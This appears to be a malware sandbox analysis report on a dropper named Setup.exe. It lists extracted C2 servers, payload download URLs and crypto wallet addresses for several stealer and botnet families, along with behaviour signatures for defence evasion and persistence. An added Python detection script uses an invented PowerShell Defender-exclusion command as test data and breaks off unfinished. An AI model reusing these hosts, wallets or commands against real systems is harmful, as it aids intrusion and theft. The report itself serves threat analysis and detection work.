Resubmissions
submitted | id | score
14-06-2024 17:24 | 240614-vyrjpazcrg | 10
14-06-2024 17:22 | 240614-vxll2stcqp | 10
12-06-2024 23:54 | 240612-3x2x2awcph | 3
Analysis
max time kernel: 103s
max time network: 660s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 14-06-2024 17:24
Static task
static1
General
Target: Setup.exe
Size: 12KB
MD5: a14e63d27e1ac1df185fa062103aa9aa
SHA1: 2b64c35e4eff4a43ab6928979b6093b95f9fd714
SHA256: dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
SHA512: 10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
SSDEEP: 192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ
Malware Config

Extracted: phorphiex
C2:
http://185.215.113.66/
http://77.91.77.92/
http://91.202.233.141/
Wallets (the addresses Phorphiex's clipboard hijacker swaps in for copied wallet addresses; Ethereum, Tron, Bitcoin, Bitcoin Cash, Litecoin, Monero and other formats are all present):
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
LLeT2zkStY3cvxMBFhoWXkG5VuZPoezduv
rwc4LVd9ABpULQ1CuCpDkgX2xVB1fUijyb
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw
bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
mutex: 55a4er5wo
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36

Extracted: amadey
Version: 4.21
Botnet: 0e6740
C2: http://147.45.47.155
install_dir: 9217037dc9
install_file: explortu.exe
strings_key: 8e894a8a4a3d0da8924003a561cfb244
url_paths: /ku4Nor9/index.php

Extracted: redline
Botnet: @LOGSCLOUDYT_BOT
C2: 185.172.128.33:8970

Extracted: xworm
Version: 5.0
C2: 64.226.123.178:6098
Mutex: 1z0ENxCLSR3XRSre
install_file: USB.exe

Extracted: xworm
Version: 3.1
C2: 185.91.127.220:7000, 200.9.155.204:7000
Mutex: 0liuzqSbSYrrf5nM
install_file: USB.exe

Extracted: redline
Botnet: 0011
C2: 185.91.127.219:33455

Extracted: lumma
C2:
https://willingyhollowsk.shop/api
https://distincttangyflippan.shop/api
https://macabrecondfucews.shop/api
https://greentastellesqwm.shop/api
https://stickyyummyskiwffe.shop/api
https://sturdyregularrmsnhw.shop/api
https://lamentablegapingkwaq.shop/api
https://innerverdanytiresw.shop/api
https://standingcomperewhitwo.shop/api
Signatures
Detect Xehook Payload 3 IoCs
resource | yara_rule
behavioral1/memory/5704-965-0x0000000000FC0000-0x0000000000FEC000-memory.dmp | family_xehook
behavioral1/memory/3840-969-0x0000000000900000-0x000000000092C000-memory.dmp | family_xehook
behavioral1/files/0x000b00000001acf3-1141.dat | family_xehook
Detect Xworm Payload 3 IoCs
resource | yara_rule
behavioral1/memory/5272-577-0x00000000005A0000-0x00000000005D6000-memory.dmp | family_xworm
behavioral1/memory/6732-1066-0x0000000000EC0000-0x0000000000EE6000-memory.dmp | family_xworm
behavioral1/memory/6168-1186-0x0000000000CA0000-0x0000000000CAE000-memory.dmp | family_xworm
Modifies security service 2 TTPs 2 IoCs
A Start value of 4 is SERVICE_DISABLED, so both droppers disable the Windows Update service (wuauserv).
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | winblrsnrcs.exe
Phorphiex payload 2 IoCs
resource | yara_rule
behavioral1/files/0x000900000001aacd-11.dat | family_phorphiex
behavioral1/files/0x000800000001abef-216.dat | family_phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 2 IoCs
resource | yara_rule
behavioral1/memory/5580-419-0x0000000000850000-0x00000000008A2000-memory.dmp | family_redline
behavioral1/memory/1256-1185-0x0000000000620000-0x0000000000670000-memory.dmp | family_redline
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
1453930929.exe creates a child with PID 3380 declared as its parent rather than itself (parent PID spoofing), so the child will not sit under 1453930929.exe in a process tree built from parent PIDs.
description | pid | Process | procid_target
PID 6100 created 3380 | 6100 | 1453930929.exe | 55
PID 6100 created 3380 | 6100 | 1453930929.exe | 55
Modifies Security Center override and notification settings 12 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | winblrsnrcs.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explortu.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explortu.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | http77.91.77.82mineamadka.exe.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | s.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | s.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explortu.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | http77.91.77.80mineamadka.exe.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid (all powershell.exe): 7204, 6752, 6676, 5756, 1000, 5112, 7668, 6072, 6560, 2284, 8028, 5800
Creates new service(s) 2 TTPs
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | http77.91.77.80mineamadka.exe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | http77.91.77.80mineamadka.exe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | http77.91.77.82mineamadka.exe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | http77.91.77.82mineamadka.exe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | s.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | s.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | s.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | s.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explortu.exe
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk | c05a20d254.exe
Executes dropped EXE 64 IoCs
The sandbox names each downloaded payload after its source URL with the punctuation stripped, so the distribution hosts can be read straight off the process names: 77.91.77.80, 77.91.77.81 and 77.91.77.82 (the "lend" and "mine" paths), 185.215.113.66, 185.172.128.127, 106.166.173.36, twizt.net and controle-bitvavo.com.
pid | Process
1304 | http185.215.113.66pei.exe.exe
1504 | httptwizt.netnewtpp.exe.exe
2124 | sysmablsvr.exe
3908 | httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe
1736 | http185.172.128.127tiktok.exe.exe
2632 | 143303174.exe
4784 | httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe
4176 | httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe
1712 | http77.91.77.80mineamadka.exe.exe
4808 | explortu.exe
5052 | explortu.exe
1452 | http77.91.77.82mineamadka.exe.exe
2272 | 406625063.exe
2952 | c05a20d254.exe
1056 | 4e6762088f.exe
5240 | 952927809.exe
5272 | http77.91.77.82lendalex.exe.exe
5580 | svhoost.exe
5596 | One.exe
5984 | http77.91.77.82lendw.exe.exe
6056 | s.exe
6100 | 1453930929.exe
6128 | http77.91.77.82lend228.exe.exe
5136 | 2026229022.exe
5420 | http77.91.77.81lendvictor.exe.exe
5792 | http77.91.77.81lendfile.exe.exe
8 | http77.91.77.81lend228.exe.exe
5228 | http77.91.77.82lendlook.exe.exe
5272 | http77.91.77.82lendlook.exe.exe
5256 | http77.91.77.81lendlook.exe.exe
5612 | http77.91.77.81lendlook.exe.exe
6024 | http77.91.77.81lendw.exe.exe
5264 | 3235322023.exe
5252 | s.exe
6044 | winblrsnrcs.exe
5284 | http106.166.173.36imgtest.exe.exe
2468 | http77.91.77.81lendswizzy.exe.exe
3292 | http106.166.173.36imgtest.exe.exe
5204 | http77.91.77.82lendfileosn.exe.exe
6064 | http77.91.77.82lendinstaller2.exe.exe
6408 | http77.91.77.82lendfile.exe.exe
6432 | http77.91.77.82lendnn.exe.exe
6508 | http77.91.77.82lendnn.exe.exe
6676 | http77.91.77.81lendfileosn.exe.exe
6660 | http77.91.77.81lendinstaller2.exe.exe
6292 | http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe
4708 | http77.91.77.81lendfud.exe.exe
6308 | http77.91.77.82lend1234.exe.exe
5284 | http77.91.77.81lendalex.exe.exe
5836 | http77.91.77.81lendnn.exe.exe
6488 | http77.91.77.81lendfud.exe.exe
5576 | http77.91.77.82lendvictor.exe.exe
6708 | http77.91.77.81lendnn.exe.exe
5704 | http77.91.77.81lend37.exe.exe
3840 | http77.91.77.81lend27.exe.exe
6220 | 1338716755.exe
5488 | http77.91.77.82lendii.exe.exe
2744 | http77.91.77.82lendfud.exe.exe
6444 | http77.91.77.82lendii.exe.exe
5864 | http77.91.77.82lendfud.exe.exe
6844 | One.exe
7080 | svhoost.exe
6112 | http77.91.77.81lendcleaner.exe.exe
764 | http77.91.77.82lendcleaner.exe.exe
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine | explortu.exe
Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine | http77.91.77.82mineamadka.exe.exe
Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine | explortu.exe
Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine | http77.91.77.80mineamadka.exe.exe
Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Wine | explortu.exe
Loads dropped DLL 1 IoCs
pid | Process
6308 | http77.91.77.82lend1234.exe.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Themida packer 5 IoCs
resource | yara_rule
behavioral1/memory/6056-604-0x0000000000190000-0x0000000000AF4000-memory.dmp | themida
behavioral1/memory/6056-607-0x0000000000190000-0x0000000000AF4000-memory.dmp | themida
behavioral1/memory/5252-852-0x0000000000190000-0x0000000000AF4000-memory.dmp | themida
behavioral1/memory/5252-853-0x0000000000190000-0x0000000000AF4000-memory.dmp | themida
behavioral1/memory/5252-951-0x0000000000190000-0x0000000000AF4000-memory.dmp | themida
UPX packed file 3 IoCs
resource | yara_rule
behavioral1/memory/5284-663-0x0000000000C70000-0x0000000001C94000-memory.dmp | upx
behavioral1/memory/3292-675-0x0000000000C70000-0x0000000001C94000-memory.dmp | upx
behavioral1/memory/5284-674-0x0000000000C70000-0x0000000001C94000-memory.dmp | upx
Modifies Security Center override and notification settings, including AntiSpywareOverride 14 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysmablsvr.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | winblrsnrcs.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | winblrsnrcs.exe
Set value (int) | \REGIS​TRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysmablsvr.exe
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | c05a20d254.exe
Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | c05a20d254.exe
Key opened | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | c05a20d254.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 6 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" | c05a20d254.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_30f85fd004d4df68ea1f8d35c18db496 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_30f85fd004d4df68ea1f8d35c18db496\\AdobeUpdaterV131.exe" | c05a20d254.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_f09ac2d587354c6431bf93812ba7548f = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_f09ac2d587354c6431bf93812ba7548f\\AdobeUpdaterV131.exe" | c05a20d254.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" | httptwizt.netnewtpp.exe.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\c05a20d254.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\c05a20d254.exe" | explortu.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winblrsnrcs.exe" | 3235322023.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Queries EnableLUA (UAC status) 2 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | s.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | s.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow | ioc
255 | bitbucket.org
287 | pastebin.com
542 | pastebin.com
543 | pastebin.com
573 | pastebin.com
176 | bitbucket.org
179 | bitbucket.org
254 | bitbucket.org
258 | pastebin.com
261 | pastebin.com
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
327 | ipinfo.io
109 | ipinfo.io
114 | ipinfo.io
194 | ip-api.com
251 | ip-api.com
323 | api.myip.com
325 | api.myip.com
326 | ipinfo.io
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system. Opening \??\PhysicalDrive0 for write gives raw access to the whole disk, MBR included; the report does not show what was written.
description | ioc | Process
File opened for modification | \??\PhysicalDrive0 | http77.91.77.82lend1234.exe.exe
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x000800000001ac1b-342.dat | autoit_exe
behavioral1/files/0x000700000001ace9-1044.dat | autoit_exe
Drops file in System32 directory 1 IoCs
MRT.exe is Microsoft's Malicious Software Removal Tool; a payload opening it for modification is tampering with a security tool, so on any affected host the file's hash should be compared with a known-good copy.
description | ioc | Process
File opened for modification | C:\Windows\system32\MRT.exe | http77.91.77.82lendinstaller2.exe.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid | Process
1712 | http77.91.77.80mineamadka.exe.exe
4808 | explortu.exe
5052 | explortu.exe
1452 | http77.91.77.82mineamadka.exe.exe
2952 | c05a20d254.exe
2952 | c05a20d254.exe
6056 | s.exe
2952 | c05a20d254.exe
5252 | s.exe
6064 | http77.91.77.82lendinstaller2.exe.exe
2952 | c05a20d254.exe
6064 | http77.91.77.82lendinstaller2.exe.exe
6660 | http77.91.77.81lendinstaller2.exe.exe
6660 | http77.91.77.81lendinstaller2.exe.exe
2952 | c05a20d254.exe
2952 | c05a20d254.exe
5476 | explortu.exe
2952 | c05a20d254.exe
Suspicious use of SetThreadContext 15 IoCs
In most rows the target PID appears in the Executes dropped EXE list under the same image name as the caller (5272, 5612, 6508, 6488, 6708, 6444, 5864), i.e. the payload launches a copy of itself and replaces its main thread's context with a new image (process hollowing / RunPE).
pid | Process | target pid | procid_target
5272 | http77.91.77.82lendalex.exe.exe | set thread context of 5412 | 109
5228 | http77.91.77.82lendlook.exe.exe | set thread context of 5272 | 130
5256 | http77.91.77.81lendlook.exe.exe | set thread context of 5612 | 134
2468 | http77.91.77.81lendswizzy.exe.exe | set thread context of 6024 | 147
5204 | http77.91.77.82lendfileosn.exe.exe | set thread context of 6336 | 152
6432 | http77.91.77.82lendnn.exe.exe | set thread context of 6508 | 270
6676 | http77.91.77.81lendfileosn.exe.exe | set thread context of 7020 | 162
4708 | http77.91.77.81lendfud.exe.exe | set thread context of 6488 | 168
5836 | http77.91.77.81lendnn.exe.exe | set thread context of 6708 | 170
5284 | http77.91.77.81lendalex.exe.exe | set thread context of 6828 | 171
5488 | http77.91.77.82lendii.exe.exe | set thread context of 6444 | 195
2744 | http77.91.77.82lendfud.exe.exe | set thread context of 5864 | 181
6384 | http77.91.77.82lendswizzy.exe.exe | set thread context of 5132 | 204
5436 | http77.91.77.81lendii.exe.exe | set thread context of 6208 | 207
5792 | http77.91.77.81lendfile.exe.exe | set thread context of 5888 | 209
Drops file in Windows directory 5 IoCs
description | ioc | Process
File created | C:\Windows\sysmablsvr.exe | httptwizt.netnewtpp.exe.exe
File opened for modification | C:\Windows\sysmablsvr.exe | httptwizt.netnewtpp.exe.exe
File created | C:\Windows\Tasks\explortu.job | http77.91.77.80mineamadka.exe.exe
File created | C:\Windows\winblrsnrcs.exe | 3235322023.exe
File opened for modification | C:\Windows\winblrsnrcs.exe | 3235322023.exe
Launches sc.exe 9 IoCs
Sc.exe is a Windows utility to control services on the system.
pid (all sc.exe): 5868, 4508, 6224, 5916, 7012, 6988, 1948, 5000, 6740
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 2 IoCs
Both crashed targets are the lendvictor payloads (5420 is http77.91.77.81lendvictor.exe.exe, 5576 is http77.91.77.82lendvictor.exe.exe in the Executes dropped EXE list).
pid | pid_target | Process | procid_target
5728 | 5420 | WerFault.exe | 120
6836 | 5576 | WerFault.exe | 169
NSIS installer 2 IoCs
resource | yara_rule
behavioral1/files/0x000700000001ac8a-529.dat | nsis_installer_1
behavioral1/files/0x000700000001ac8a-529.dat | nsis_installer_2
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | httpscontrole-bitvavo.comchecknuuBitvavo-scanner.exe.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | c05a20d254.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | c05a20d254.exe
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid (all schtasks.exe): 4772, 3128, 6524, 6508, 2080, 2988, 5876, 6548, 4608, 4080, 6448
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid (all tasklist.exe): 7484, 5596, 1256, 1056
Enumerates system info in registry 2 TTPs 3 IoCs
These reads come from chrome.exe, which 4e6762088f.exe launched (1056 wrote to 3188 in the WriteProcessMemory table), not from the payloads themselves.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133628595149355083" | chrome.exe
Adds a certificate to the machine ROOT store 2 IoCs
A rogue root certificate lets the operator intercept TLS without browser warnings. Anyone triaging a host from this report should look for thumbprint F1A578C4CB5DE79A370893983FD4DA8B67B2B064 in the LocalMachine\Root store (certlm.msc) and remove it.
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | svhoost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (blob data omitted) | svhoost.exe
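The registry, process and DNS behaviour recorded in this report (the wuauserv Start change, the Security Center override values, the PowerShell Defender exclusions, the Run keys pointing at loose EXEs in C:\Windows, the root-store certificate, and the IP-lookup and paste-site contacts) maps directly onto endpoint telemetry. The script below is an added example, not sandbox output, of detection logic run over constructed events in the shape of Sysmon Event ID 13 (registry value set), 1 (process create) and 22 (DNS query). The field names are an assumption, and the PowerShell command line is invented, since the report only states that exclusions were added; the registry paths, process names and thumbprint are taken from the signatures above.

```python
"""
Detection rules modelled on the registry, process and DNS behaviour this
report records. Added example, not sandbox output: the events are
constructed in the shape of Sysmon Event ID 13 / 1 / 22, the field names
are an assumption, and the PowerShell command line is invented.
"""
import re
from dataclasses import dataclass

EVENTS = [
    {"id": 13, "image": r"C:\Windows\sysmablsvr.exe",
     "target": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride",
     "details": "DWORD (0x00000001)"},
    {"id": 13, "image": r"C:\Windows\winblrsnrcs.exe",
     "target": r"HKLM\SYSTEM\ControlSet001\Services\wuauserv\Start",
     "details": "DWORD (0x00000004)"},
    {"id": 13, "image": r"C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe",
     "target": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings",
     "details": r"C:\Windows\sysmablsvr.exe"},
    {"id": 13, "image": r"C:\Users\Admin\AppData\Local\Temp\svhoost.exe",   # path assumed
     "target": r"HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob",
     "details": "Binary Data"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"},
    {"id": 22, "image": r"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend37.exe.exe",
     "query": "ipinfo.io"},
    {"id": 13, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",   # benign control
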